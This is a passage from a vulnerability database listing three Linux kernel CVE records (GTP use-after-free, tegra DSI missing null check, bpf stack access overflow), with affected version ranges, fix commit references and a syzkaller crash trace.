          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.7"
            },
            {
              "lessThan": "4.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.309",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.271",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.212",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.151",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.81",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.21",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.309",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.271",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.212",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.151",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.81",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.21",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.9",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngtp: fix use-after-free and null-ptr-deref in gtp_newlink()\n\nThe gtp_link_ops operations structure for the subsystem must be\nregistered after registering the gtp_net_ops pernet operations structure.\n\nSyzkaller hit \u0027general protection fault in gtp_genl_dump_pdp\u0027 bug:\n\n[ 1010.702740] gtp: GTP module unloaded\n[ 1010.715877] general protection fault, probably for non-canonical address 0xdffffc0000000001: 0000 [#1] SMP KASAN NOPTI\n[ 1010.715888] KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]\n[ 1010.715895] CPU: 1 PID: 128616 Comm: a.out Not tainted 6.8.0-rc6-std-def-alt1 #1\n[ 1010.715899] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.0-alt1 04/01/2014\n[ 1010.715908] RIP: 0010:gtp_newlink+0x4d7/0x9c0 [gtp]\n[ 1010.715915] Code: 80 3c 02 00 0f 85 41 04 00 00 48 8b bb d8 05 00 00 e8 ed f6 ff ff 48 89 c2 48 89 c5 48 b8 00 00 00 00 00 fc ff df 48 c1 ea 03 \u003c80\u003e 3c 02 00 0f 85 4f 04 00 00 4c 89 e2 4c 8b 6d 00 48 b8 00 00 00\n[ 1010.715920] RSP: 0018:ffff888020fbf180 EFLAGS: 00010203\n[ 1010.715929] RAX: dffffc0000000000 RBX: ffff88800399c000 RCX: 0000000000000000\n[ 1010.715933] RDX: 0000000000000001 RSI: ffffffff84805280 RDI: 0000000000000282\n[ 1010.715938] RBP: 000000000000000d R08: 0000000000000001 R09: 0000000000000000\n[ 1010.715942] R10: 0000000000000001 R11: 0000000000000001 R12: ffff88800399cc80\n[ 1010.715947] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000400\n[ 1010.715953] FS:  00007fd1509ab5c0(0000) GS:ffff88805b300000(0000) knlGS:0000000000000000\n[ 1010.715958] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 1010.715962] CR2: 0000000000000000 CR3: 000000001c07a000 CR4: 0000000000750ee0\n[ 1010.715968] PKRU: 55555554\n[ 1010.715972] Call Trace:\n[ 1010.715985]  ? __die_body.cold+0x1a/0x1f\n[ 1010.715995]  ? die_addr+0x43/0x70\n[ 1010.716002]  ? exc_general_protection+0x199/0x2f0\n[ 1010.716016]  ? asm_exc_general_protection+0x1e/0x30\n[ 1010.716026]  ? gtp_newlink+0x4d7/0x9c0 [gtp]\n[ 1010.716034]  ? gtp_net_exit+0x150/0x150 [gtp]\n[ 1010.716042]  __rtnl_newlink+0x1063/0x1700\n[ 1010.716051]  ? rtnl_setlink+0x3c0/0x3c0\n[ 1010.716063]  ? is_bpf_text_address+0xc0/0x1f0\n[ 1010.716070]  ? kernel_text_address.part.0+0xbb/0xd0\n[ 1010.716076]  ? __kernel_text_address+0x56/0xa0\n[ 1010.716084]  ? unwind_get_return_address+0x5a/0xa0\n[ 1010.716091]  ? create_prof_cpu_mask+0x30/0x30\n[ 1010.716098]  ? arch_stack_walk+0x9e/0xf0\n[ 1010.716106]  ? stack_trace_save+0x91/0xd0\n[ 1010.716113]  ? stack_trace_consume_entry+0x170/0x170\n[ 1010.716121]  ? __lock_acquire+0x15c5/0x5380\n[ 1010.716139]  ? mark_held_locks+0x9e/0xe0\n[ 1010.716148]  ? kmem_cache_alloc_trace+0x35f/0x3c0\n[ 1010.716155]  ? __rtnl_newlink+0x1700/0x1700\n[ 1010.716160]  rtnl_newlink+0x69/0xa0\n[ 1010.716166]  rtnetlink_rcv_msg+0x43b/0xc50\n[ 1010.716172]  ? rtnl_fdb_dump+0x9f0/0x9f0\n[ 1010.716179]  ? lock_acquire+0x1fe/0x560\n[ 1010.716188]  ? netlink_deliver_tap+0x12f/0xd50\n[ 1010.716196]  netlink_rcv_skb+0x14d/0x440\n[ 1010.716202]  ? rtnl_fdb_dump+0x9f0/0x9f0\n[ 1010.716208]  ? netlink_ack+0xab0/0xab0\n[ 1010.716213]  ? netlink_deliver_tap+0x202/0xd50\n[ 1010.716220]  ? netlink_deliver_tap+0x218/0xd50\n[ 1010.716226]  ? __virt_addr_valid+0x30b/0x590\n[ 1010.716233]  netlink_unicast+0x54b/0x800\n[ 1010.716240]  ? netlink_attachskb+0x870/0x870\n[ 1010.716248]  ? __check_object_size+0x2de/0x3b0\n[ 1010.716254]  netlink_sendmsg+0x938/0xe40\n[ 1010.716261]  ? netlink_unicast+0x800/0x800\n[ 1010.716269]  ? __import_iovec+0x292/0x510\n[ 1010.716276]  ? netlink_unicast+0x800/0x800\n[ 1010.716284]  __sock_sendmsg+0x159/0x190\n[ 1010.716290]  ____sys_sendmsg+0x712/0x880\n[ 1010.716297]  ? sock_write_iter+0x3d0/0x3d0\n[ 1010.716304]  ? __ia32_sys_recvmmsg+0x270/0x270\n[ 1010.716309]  ? lock_acquire+0x1fe/0x560\n[ 1010.716315]  ? drain_array_locked+0x90/0x90\n[ 1010.716324]  ___sys_sendmsg+0xf8/0x170\n[ 1010.716331]  ? sendmsg_copy_msghdr+0x170/0x170\n[ 1010.716337]  ? lockdep_init_map\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:56:40.199Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/01129059d5141d62fae692f7a336ae3bc712d3eb"
        },
        {
          "url": "https://git.kernel.org/stable/c/ec92aa2cab6f0048f10d6aa4f025c5885cb1a1b6"
        },
        {
          "url": "https://git.kernel.org/stable/c/e668b92a3a01429923fd5ca13e99642aab47de69"
        },
        {
          "url": "https://git.kernel.org/stable/c/9376d059a705c5dfaac566c2d09891242013ae16"
        },
        {
          "url": "https://git.kernel.org/stable/c/abd32d7f5c0294c1b2454c5a3b13b18446bac627"
        },
        {
          "url": "https://git.kernel.org/stable/c/93dd420bc41531c9a31498b9538ca83ba6ec191e"
        },
        {
          "url": "https://git.kernel.org/stable/c/5366969a19a8a0d2ffb3d27ef6e8905e5e4216f8"
        },
        {
          "url": "https://git.kernel.org/stable/c/616d82c3cfa2a2146dd7e3ae47bda7e877ee549e"
        }
      ],
      "title": "gtp: fix use-after-free and null-ptr-deref in gtp_newlink()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26793",
    "datePublished": "2024-04-04T08:20:23.771Z",
    "dateReserved": "2024-02-19T14:20:24.178Z",
    "dateUpdated": "2025-05-04T08:56:40.199Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2023-52650 (GCVE-0-2023-52650)

Vulnerability from cvelistv5 – Published: 2024-05-01 12:53 – Updated: 2025-05-04 07:40

Title

drm/tegra: dsi: Add missing check for of_find_device_by_node

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/tegra: dsi: Add missing check for of_find_device_by_node Add check for the return value of of_find_device_by_node() and return the error if it fails in order to avoid NULL pointer dereference.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/47a13d0b9d8527518…
	https://git.kernel.org/stable/c/f05631a8525c3b5e5…
	https://git.kernel.org/stable/c/92003981a6df5dc84…
	https://git.kernel.org/stable/c/93128052bf8323595…
	https://git.kernel.org/stable/c/50c0ad785a780c72a…
	https://git.kernel.org/stable/c/52aa507148c4aad41…
	https://git.kernel.org/stable/c/c5d2342d24ef6e08f…
	https://git.kernel.org/stable/c/3169eaf1365541fd8…
	https://git.kernel.org/stable/c/afe6fcb9775882230…

Impacted products

Vendor

Product

Version

Linux

Affected: e94236cde4d519cdecd45e2435defba33abdc99f , < 47a13d0b9d8527518639ab5c39667f69d6203e80 (git)
Affected: e94236cde4d519cdecd45e2435defba33abdc99f , < f05631a8525c3b5e5994ecb1304d2d878956c0f5 (git)
Affected: e94236cde4d519cdecd45e2435defba33abdc99f , < 92003981a6df5dc84af8a5904f8ee112fa324129 (git)
Affected: e94236cde4d519cdecd45e2435defba33abdc99f , < 93128052bf832359531c3c0a9e3567b2b8682a2d (git)
Affected: e94236cde4d519cdecd45e2435defba33abdc99f , < 50c0ad785a780c72a2fdaba10b38c645ffb4eae6 (git)
Affected: e94236cde4d519cdecd45e2435defba33abdc99f , < 52aa507148c4aad41436e2005d742ffcafad9976 (git)
Affected: e94236cde4d519cdecd45e2435defba33abdc99f , < c5d2342d24ef6e08fc90a529fe3dc59de421a2b9 (git)
Affected: e94236cde4d519cdecd45e2435defba33abdc99f , < 3169eaf1365541fd8e521091010c44fbe14691fc (git)
Affected: e94236cde4d519cdecd45e2435defba33abdc99f , < afe6fcb9775882230cd29b529203eabd5d2a638d (git)

Linux

Affected: 3.19
Unaffected: 0 , < 3.19 (semver)
Unaffected: 4.19.311 , ≤ 4.19.* (semver)
Unaffected: 5.4.273 , ≤ 5.4.* (semver)
Unaffected: 5.10.214 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-52650",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-13T19:31:29.279840Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-13T19:31:41.334Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T23:03:21.316Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/47a13d0b9d8527518639ab5c39667f69d6203e80"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f05631a8525c3b5e5994ecb1304d2d878956c0f5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/92003981a6df5dc84af8a5904f8ee112fa324129"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/93128052bf832359531c3c0a9e3567b2b8682a2d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/50c0ad785a780c72a2fdaba10b38c645ffb4eae6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/52aa507148c4aad41436e2005d742ffcafad9976"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c5d2342d24ef6e08fc90a529fe3dc59de421a2b9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3169eaf1365541fd8e521091010c44fbe14691fc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/afe6fcb9775882230cd29b529203eabd5d2a638d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/tegra/dsi.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "47a13d0b9d8527518639ab5c39667f69d6203e80",
              "status": "affected",
              "version": "e94236cde4d519cdecd45e2435defba33abdc99f",
              "versionType": "git"
            },
            {
              "lessThan": "f05631a8525c3b5e5994ecb1304d2d878956c0f5",
              "status": "affected",
              "version": "e94236cde4d519cdecd45e2435defba33abdc99f",
              "versionType": "git"
            },
            {
              "lessThan": "92003981a6df5dc84af8a5904f8ee112fa324129",
              "status": "affected",
              "version": "e94236cde4d519cdecd45e2435defba33abdc99f",
              "versionType": "git"
            },
            {
              "lessThan": "93128052bf832359531c3c0a9e3567b2b8682a2d",
              "status": "affected",
              "version": "e94236cde4d519cdecd45e2435defba33abdc99f",
              "versionType": "git"
            },
            {
              "lessThan": "50c0ad785a780c72a2fdaba10b38c645ffb4eae6",
              "status": "affected",
              "version": "e94236cde4d519cdecd45e2435defba33abdc99f",
              "versionType": "git"
            },
            {
              "lessThan": "52aa507148c4aad41436e2005d742ffcafad9976",
              "status": "affected",
              "version": "e94236cde4d519cdecd45e2435defba33abdc99f",
              "versionType": "git"
            },
            {
              "lessThan": "c5d2342d24ef6e08fc90a529fe3dc59de421a2b9",
              "status": "affected",
              "version": "e94236cde4d519cdecd45e2435defba33abdc99f",
              "versionType": "git"
            },
            {
              "lessThan": "3169eaf1365541fd8e521091010c44fbe14691fc",
              "status": "affected",
              "version": "e94236cde4d519cdecd45e2435defba33abdc99f",
              "versionType": "git"
            },
            {
              "lessThan": "afe6fcb9775882230cd29b529203eabd5d2a638d",
              "status": "affected",
              "version": "e94236cde4d519cdecd45e2435defba33abdc99f",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/tegra/dsi.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.19"
            },
            {
              "lessThan": "3.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.311",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.273",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.214",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.311",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.273",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.214",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tegra: dsi: Add missing check for of_find_device_by_node\n\nAdd check for the return value of of_find_device_by_node() and return\nthe error if it fails in order to avoid NULL pointer dereference."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T07:40:52.466Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/47a13d0b9d8527518639ab5c39667f69d6203e80"
        },
        {
          "url": "https://git.kernel.org/stable/c/f05631a8525c3b5e5994ecb1304d2d878956c0f5"
        },
        {
          "url": "https://git.kernel.org/stable/c/92003981a6df5dc84af8a5904f8ee112fa324129"
        },
        {
          "url": "https://git.kernel.org/stable/c/93128052bf832359531c3c0a9e3567b2b8682a2d"
        },
        {
          "url": "https://git.kernel.org/stable/c/50c0ad785a780c72a2fdaba10b38c645ffb4eae6"
        },
        {
          "url": "https://git.kernel.org/stable/c/52aa507148c4aad41436e2005d742ffcafad9976"
        },
        {
          "url": "https://git.kernel.org/stable/c/c5d2342d24ef6e08fc90a529fe3dc59de421a2b9"
        },
        {
          "url": "https://git.kernel.org/stable/c/3169eaf1365541fd8e521091010c44fbe14691fc"
        },
        {
          "url": "https://git.kernel.org/stable/c/afe6fcb9775882230cd29b529203eabd5d2a638d"
        }
      ],
      "title": "drm/tegra: dsi: Add missing check for of_find_device_by_node",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2023-52650",
    "datePublished": "2024-05-01T12:53:12.145Z",
    "dateReserved": "2024-03-06T09:52:12.097Z",
    "dateUpdated": "2025-05-04T07:40:52.466Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35905 (GCVE-0-2024-35905)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2025-05-04 12:56

Title

bpf: Protect against int overflow for stack access size

Summary

In the Linux kernel, the following vulnerability has been resolved: bpf: Protect against int overflow for stack access size This patch re-introduces protection against the size of access to stack memory being negative; the access size can appear negative as a result of overflowing its signed int representation. This should not actually happen, as there are other protections along the way, but we should protect against it anyway. One code path was missing such protections (fixed in the previous patch in the series), causing out-of-bounds array accesses in check_stack_range_initialized(). This patch causes the verification of a program with such a non-sensical access size to fail. This check used to exist in a more indirect way, but was inadvertendly removed in a833a17aeac7.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/9970e059af4714784…
	https://git.kernel.org/stable/c/37dc1718dc0c4392d…
	https://git.kernel.org/stable/c/98cdac206b112bec6…
	https://git.kernel.org/stable/c/3f0784b2f1eb91479…
	https://git.kernel.org/stable/c/203a68151e8eeb331…
	https://git.kernel.org/stable/c/ecc6a2101840177e5…

Impacted products

Vendor

Product

Version

Linux

Affected: afea95d319ccb4ad2060dece9ac5e2e364dec543 , < 9970e059af471478455f9534e8c3db82f8c5496d (git)
Affected: 02962684258eb53f414a8a59854767be526e6abb , < 37dc1718dc0c4392dbfcb9adec22a776e745dd69 (git)
Affected: b1d4d54d32ce6342f5faffe71bae736540ce7cb5 , < 98cdac206b112bec63852e94802791e316acc2c1 (git)
Affected: 08b91babccbb168353f8d43fea0ed28a4cad568c , < 3f0784b2f1eb9147973d8c43ba085c5fdf44ff69 (git)
Affected: a833a17aeac73b33f79433d7cee68d5cafd71e4f , < 203a68151e8eeb331d4a64ab78303f3a15faf103 (git)
Affected: a833a17aeac73b33f79433d7cee68d5cafd71e4f , < ecc6a2101840177e57c925c102d2d29f260d37c8 (git)
Affected: 1858b8a331937f3976d8482cd5f6e1f945294ad3 (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35905",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-21T15:34:20.280116Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:52.056Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.025Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9970e059af471478455f9534e8c3db82f8c5496d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/37dc1718dc0c4392dbfcb9adec22a776e745dd69"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/98cdac206b112bec63852e94802791e316acc2c1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3f0784b2f1eb9147973d8c43ba085c5fdf44ff69"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/203a68151e8eeb331d4a64ab78303f3a15faf103"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ecc6a2101840177e57c925c102d2d29f260d37c8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "kernel/bpf/verifier.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "9970e059af471478455f9534e8c3db82f8c5496d",
              "status": "affected",
              "version": "afea95d319ccb4ad2060dece9ac5e2e364dec543",
              "versionType": "git"
            },
            {
              "lessThan": "37dc1718dc0c4392dbfcb9adec22a776e745dd69",
              "status": "affected",
              "version": "02962684258eb53f414a8a59854767be526e6abb",
              "versionType": "git"
            },
            {
              "lessThan": "98cdac206b112bec63852e94802791e316acc2c1",
              "status": "affected",
              "version": "b1d4d54d32ce6342f5faffe71bae736540ce7cb5",
              "versionType": "git"
            },
            {
              "lessThan": "3f0784b2f1eb9147973d8c43ba085c5fdf44ff69",
              "status": "affected",
              "version": "08b91babccbb168353f8d43fea0ed28a4cad568c",
              "versionType": "git"
            },
            {
              "lessThan": "203a68151e8eeb331d4a64ab78303f3a15faf103",
              "status": "affected",
              "version": "a833a17aeac73b33f79433d7cee68d5cafd71e4f",
              "versionType": "git"
            },
            {
              "lessThan": "ecc6a2101840177e57c925c102d2d29f260d37c8",
              "status": "affected",
              "version": "a833a17aeac73b33f79433d7cee68d5cafd71e4f",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "1858b8a331937f3976d8482cd5f6e1f945294ad3",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "kernel/bpf/verifier.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "5.10.209",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.15.148",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "6.1.75",
